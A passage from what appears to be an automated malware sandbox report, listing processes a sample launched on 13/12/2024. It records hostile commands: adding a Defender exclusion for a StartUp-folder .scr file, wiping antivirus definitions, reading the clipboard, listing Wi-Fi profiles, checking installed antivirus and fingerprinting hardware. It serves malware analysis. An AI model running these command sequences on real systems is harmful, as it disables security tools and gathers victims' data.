                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:02:41:47
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:02:41:47
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                            Imagebase:0x7ff734040000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:02:41:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                            Imagebase:0x7ff734040000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                            Start time:02:41:49
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                            Start time:02:41:49
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                            Start time:02:41:49
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                            Start time:02:41:51
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                            Start time:02:41:51
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                            Start time:02:41:51
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                            Start time:02:41:52
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                            Start time:02:41:52
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                            Start time:02:41:52
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff606630000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff606630000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                            Start time:02:41:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                            Start time:02:41:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                            Start time:02:41:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff606630000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                            Start time:02:41:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                            Imagebase:0x7ff60a240000
                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
